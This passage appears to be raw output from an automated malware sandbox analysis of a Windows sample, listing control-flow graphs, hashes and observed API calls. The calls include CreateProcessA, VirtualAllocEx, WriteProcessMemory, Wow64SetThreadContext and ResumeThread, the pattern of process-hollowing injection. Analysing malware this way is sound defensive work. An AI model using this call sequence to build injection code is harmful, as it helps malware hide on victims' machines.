                                                                                                                                                                                                                                                                                                control_flow_graph 102 743bde8-743be7d 104 743beb6-743bed6 102->104 105 743be7f-743be89 102->105 110 743bed8-743bee2 104->110 111 743bf0f-743bf3e 104->111 105->104 106 743be8b-743be8d 105->106 108 743beb0-743beb3 106->108 109 743be8f-743be99 106->109 108->104 112 743be9b 109->112 113 743be9d-743beac 109->113 110->111 115 743bee4-743bee6 110->115 121 743bf40-743bf4a 111->121 122 743bf77-743c031 CreateProcessA 111->122 112->113 113->113 114 743beae 113->114 114->108 116 743bf09-743bf0c 115->116 117 743bee8-743bef2 115->117 116->111 119 743bef6-743bf05 117->119 120 743bef4 117->120 119->119 124 743bf07 119->124 120->119 121->122 123 743bf4c-743bf4e 121->123 133 743c033-743c039 122->133 134 743c03a-743c0c0 122->134 125 743bf71-743bf74 123->125 126 743bf50-743bf5a 123->126 124->116 125->122 128 743bf5e-743bf6d 126->128 129 743bf5c 126->129 128->128 130 743bf6f 128->130 129->128 130->125 133->134 144 743c0c2-743c0c6 134->144 145 743c0d0-743c0d4 134->145 144->145 146 743c0c8 144->146 147 743c0d6-743c0da 145->147 148 743c0e4-743c0e8 145->148 146->145 147->148 151 743c0dc 147->151 149 743c0ea-743c0ee 148->149 150 743c0f8-743c0fc 148->150 149->150 152 743c0f0 149->152 153 743c10e-743c115 150->153 154 743c0fe-743c104 150->154 151->148 152->150 155 743c117-743c126 153->155 156 743c12c 153->156 154->153 155->156 158 743c12d 156->158 158->158
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0743C01E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b184f06dff2e334cfa6d0a67572cbb64f1fd2b6767f5118810fadd1f5971942c
                                                                                                                                                                                                                                                                                                • Instruction ID: d0caacd3f629bdfca6bf7875fb4b84322173616ad303d051121567f79e9d2116
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b184f06dff2e334cfa6d0a67572cbb64f1fd2b6767f5118810fadd1f5971942c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E914CB1D00259DFDF14CFA8C9817DEBBB2FB48314F1485AAE808A7280DB759985CF91

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 159 161ad88-161ad97 160 161adc3-161adc7 159->160 161 161ad99-161ada6 call 161a0e0 159->161 163 161adc9-161add3 160->163 164 161addb-161ae1c 160->164 166 161ada8 161->166 167 161adbc 161->167 163->164 170 161ae29-161ae37 164->170 171 161ae1e-161ae26 164->171 214 161adae call 161b020 166->214 215 161adae call 161b010 166->215 167->160 172 161ae39-161ae3e 170->172 173 161ae5b-161ae5d 170->173 171->170 175 161ae40-161ae47 call 161a0ec 172->175 176 161ae49 172->176 177 161ae60-161ae67 173->177 174 161adb4-161adb6 174->167 178 161aef8-161afb8 174->178 179 161ae4b-161ae59 175->179 176->179 181 161ae74-161ae7b 177->181 182 161ae69-161ae71 177->182 209 161afc0-161afeb GetModuleHandleW 178->209 210 161afba-161afbd 178->210 179->177 185 161ae88-161ae91 call 161a0fc 181->185 186 161ae7d-161ae85 181->186 182->181 190 161ae93-161ae9b 185->190 191 161ae9e-161aea3 185->191 186->185 190->191 192 161aec1-161aece 191->192 193 161aea5-161aeac 191->193 200 161aef1-161aef7 192->200 201 161aed0-161aeee 192->201 193->192 195 161aeae-161aebe call 161a10c call 161a11c 193->195 195->192 201->200 211 161aff4-161b008 209->211 212 161afed-161aff3 209->212 210->209 212->211 214->174 215->174
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0161AFDE
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2134282321.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1610000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 19afc03001cd5844ed2d8efa8558ef363d1520e0dcee2e44fa36f92198722171
                                                                                                                                                                                                                                                                                                • Instruction ID: 25403071e6ed846d91e52e76c8496e73ffd3384000f8009983fdb3f1f0fa2437
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 19afc03001cd5844ed2d8efa8558ef363d1520e0dcee2e44fa36f92198722171
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC714570A01B468FEB24DFA9D85475ABBF1FF88204F04892DD58AD7B44DB74E845CB90

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 216 161590c-16159d9 CreateActCtxA 218 16159e2-1615a3c 216->218 219 16159db-16159e1 216->219 226 1615a4b-1615a4f 218->226 227 1615a3e-1615a41 218->227 219->218 228 1615a51-1615a5d 226->228 229 1615a60 226->229 227->226 228->229 231 1615a61 229->231 231->231
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 016159C9
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2134282321.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1610000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                                                                                                                                • Opcode ID: a22f0ad82aac8b896a5da1c52bc8f5e19bbfc0043f1b20a35d6f31b0dca4b024
                                                                                                                                                                                                                                                                                                • Instruction ID: 06c1f351ea1942e7c410c08b7524de71589ca11d2e8d42d736d5ee391f4218da
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a22f0ad82aac8b896a5da1c52bc8f5e19bbfc0043f1b20a35d6f31b0dca4b024
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8411271C0071DCFDB24CFAAC884B8EBBB2BF89704F24806AD409AB255DB716945CF50

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 232 16144b4-16159d9 CreateActCtxA 235 16159e2-1615a3c 232->235 236 16159db-16159e1 232->236 243 1615a4b-1615a4f 235->243 244 1615a3e-1615a41 235->244 236->235 245 1615a51-1615a5d 243->245 246 1615a60 243->246 244->243 245->246 248 1615a61 246->248 248->248
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 016159C9
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2134282321.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1610000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 0c51c501ef0152294a667fd968249d81df4aea5f1ec4ba50a0995e8f16c6d2d9
                                                                                                                                                                                                                                                                                                • Instruction ID: ae6d6a01551b0a3a03dedb0256fba236043000604bea4a2864f23d9f6f217981
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c51c501ef0152294a667fd968249d81df4aea5f1ec4ba50a0995e8f16c6d2d9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD4101B0C0071DCBDB24CFA9C984B8EFBB6BF89704F24846AD409AB255DB716945CF90

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 249 743bb59-743bb5d 250 743bba6-743bbab 249->250 251 743bb5f-743bba1 249->251 253 743bbbd 250->253 254 743bbad-743bbae 250->254 251->250 255 743bbbe-743bbfd WriteProcessMemory 253->255 254->255 256 743bbb0-743bbbc 254->256 258 743bc06-743bc36 255->258 259 743bbff-743bc05 255->259 256->253 259->258
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0743BBF0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 6240c3cede4135a6fd35796414a72492bbf1b92e560277302a904ab690dd9ab0
                                                                                                                                                                                                                                                                                                • Instruction ID: 1ea63689c8d9382695d59f18c4f9509b614cd9ba4b71b6250c2700cc02938434
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6240c3cede4135a6fd35796414a72492bbf1b92e560277302a904ab690dd9ab0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E316AB69003499FDB10CFA9C881BEEBBF5FF48310F14846EE559A7241DB799540CB94

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 263 743b9c1-743ba13 266 743ba23-743ba53 Wow64SetThreadContext 263->266 267 743ba15-743ba21 263->267 269 743ba55-743ba5b 266->269 270 743ba5c-743ba8c 266->270 267->266 269->270
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0743BA46
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 5258a06dcdf0dfe3e616aba73dfe59f50299e12692c600b2a4e58bfe61123373
                                                                                                                                                                                                                                                                                                • Instruction ID: 810faa2311b9ee140330d2eb7a21e5b9cfe8cf32166df09a1cceb4c36540cf58
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5258a06dcdf0dfe3e616aba73dfe59f50299e12692c600b2a4e58bfe61123373
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 772168B19007098FDB10DFAAC4817EEBBF4EF88320F10842AD519A7341DB78A944CFA5

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 286 743bc48-743bc4d 287 743bc96-743bcdd ReadProcessMemory 286->287 288 743bc4f-743bc94 286->288 292 743bce6-743bd16 287->292 293 743bcdf-743bce5 287->293 288->287 293->292
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0743BCD0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c7012216c7ba9ca7959baf767fdae8820717165c8ef139f5aad715674d3ac6c5
                                                                                                                                                                                                                                                                                                • Instruction ID: c7f3a30b3caee0155704bc72d9508c4f7650ff23dccf8f6dbb3786abdb5bbf49
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7012216c7ba9ca7959baf767fdae8820717165c8ef139f5aad715674d3ac6c5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C2139B58003499FDB10CFAAC881BEEBBF5FF48320F50842EE518A7240DB799550CBA5

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 274 743bb60-743bbab 276 743bbbd 274->276 277 743bbad-743bbae 274->277 278 743bbbe-743bbfd WriteProcessMemory 276->278 277->278 279 743bbb0-743bbbc 277->279 281 743bc06-743bc36 278->281 282 743bbff-743bc05 278->282 279->276 282->281
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0743BBF0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 887c0987b74f80d9ac020f738a851e17ba0f496a8cfc2546cef56b66ec63827d
                                                                                                                                                                                                                                                                                                • Instruction ID: 75cdcaf44ba70fb9add66cc84d2a543abcadc47f6972645af601eb62936eecf6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 887c0987b74f80d9ac020f738a851e17ba0f496a8cfc2546cef56b66ec63827d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA2127B59003599FDF10CFAAC881BEEBBF5FF48310F10842AE959A7240C7789950CBA4

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 297 161d658-161d65c 298 161d6a2-161d6f4 DuplicateHandle 297->298 299 161d65e-161d69f 297->299 300 161d6f6-161d6fc 298->300 301 161d6fd-161d71a 298->301 299->298 300->301
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0161D6E7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2134282321.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1610000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 71d239f973a1330407d54b109a29e2662cebf55c5f20f71e7950451a12ff8d8a
                                                                                                                                                                                                                                                                                                • Instruction ID: cf5f9dee5c3ace9eb40c560662ddcb2f73b5e556c964b5f65636fd81a3b61741
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71d239f973a1330407d54b109a29e2662cebf55c5f20f71e7950451a12ff8d8a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A2137B5800259DFDB10CFA9D984BDEBFF4AF08320F18855AE958A7350C378A941CFA1

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 314 743bc50-743bcdd ReadProcessMemory 318 743bce6-743bd16 314->318 319 743bcdf-743bce5 314->319 319->318
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0743BCD0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 3a4d6e19fcca10db8c69eac2a98612c9c8e92fe49ecb0e6b62bb70bcde16ee18
                                                                                                                                                                                                                                                                                                • Instruction ID: 2a9e202151c71dce5b0e735c34380dd7c31aad1889ca5fc92a69eb65c0318732
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a4d6e19fcca10db8c69eac2a98612c9c8e92fe49ecb0e6b62bb70bcde16ee18
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B2116B18003499FDB10CFAAC881BDEBBF5FF48310F10842AE519A7240C7799950CBA5

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 304 743b9c8-743ba13 306 743ba23-743ba53 Wow64SetThreadContext 304->306 307 743ba15-743ba21 304->307 309 743ba55-743ba5b 306->309 310 743ba5c-743ba8c 306->310 307->306 309->310
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0743BA46
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 34a013f6d12ac23292228916116c3fb45bb12fcc463711b95e097ad8dc3e3cf9
                                                                                                                                                                                                                                                                                                • Instruction ID: b77c0604d1ed275d2ccef210bff168f92869927dc3d72e21006fd75bf2c2171b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34a013f6d12ac23292228916116c3fb45bb12fcc463711b95e097ad8dc3e3cf9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A2135B19003098FDB10DFAAC4857EEBBF4EF88320F14842AD519A7240DB78A944CFA5

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 323 161d660-161d6f4 DuplicateHandle 324 161d6f6-161d6fc 323->324 325 161d6fd-161d71a 323->325 324->325
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0161D6E7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2134282321.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1610000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 8b51b596ff82d4c759697ac830b4e934d4e5724f411164a15ca4d9f9e935a307
                                                                                                                                                                                                                                                                                                • Instruction ID: be250bd7f59bb2dd7e10c1a984ebb8af5fefec34675c483364f109d65a5f89a1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b51b596ff82d4c759697ac830b4e934d4e5724f411164a15ca4d9f9e935a307
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3521E4B5900209DFDB10CF9AD984ADEBFF4FB48320F14841AE918A3310D378A950CFA4
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0743BB0E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 6ec107ea495bea4d96d1dd6b84381334c2e86ee032505cdb1b1c516333c1810c
                                                                                                                                                                                                                                                                                                • Instruction ID: 5171bdfc537c1b121cc57db158d063dd4a8972c300c3ef5e1e03108de4ef9e06
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ec107ea495bea4d96d1dd6b84381334c2e86ee032505cdb1b1c516333c1810c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A118EB69003099FDB10DF9AC4417DFBBF5EF88320F108419D515A7250CB759950CFA4
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 7f347f6610be4f3e5f63c36ef5222c02187fc516dd40cb06313ebe63a9b78858
                                                                                                                                                                                                                                                                                                • Instruction ID: 19009320cfa4f938bf9e59c3685a13bcb4a129b2939e1003bc3bfb7299a5859a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f347f6610be4f3e5f63c36ef5222c02187fc516dd40cb06313ebe63a9b78858
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 001146B59003498FDB20DFAAC4457EEFBF4EF88320F20841AD519A7240CB79A940CBA5
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0743BB0E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 450ae7d062e07c71a169a63cbfaf7f35e74825b3feba6a19128a701867931590
                                                                                                                                                                                                                                                                                                • Instruction ID: 94d04477bcda5b7895edac100791bdfb7570cecad7796d86a2497df8a3420d97
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 450ae7d062e07c71a169a63cbfaf7f35e74825b3feba6a19128a701867931590
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E01159B19002499FDB10CFAAC845BEFBBF5EF88320F108419E519A7250CB75A550CFA4
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0743E63D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 4df4a899f0e811313e1b81fb49cbd50454f0759c8d6c90fbf80a9864f0fa6735
                                                                                                                                                                                                                                                                                                • Instruction ID: 1340f6e40ea0a6243314876bc9b1f6b28117d6485530da47db9759ab759fe2a6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4df4a899f0e811313e1b81fb49cbd50454f0759c8d6c90fbf80a9864f0fa6735
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A21133B58007199FDB20DF9AD845BDFBBF8EB48320F20840AE518A3340C375A984CFA5
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c03c454fd7566aec3b8191aa7e7741e31687b0ba720a76313c3f9c252fe8b321
                                                                                                                                                                                                                                                                                                • Instruction ID: 6af6e05d7b2383da9769112b2e42bfc242a3d6e4a9bf4cd9ec227ebeb195a50b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c03c454fd7566aec3b8191aa7e7741e31687b0ba720a76313c3f9c252fe8b321
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 331125B19003498FDB20DFAAC4457EFFBF5EF88624F24841AD519A7240CB79A940CBA5
                                                                                                                                                                                                                                                                                                APIs
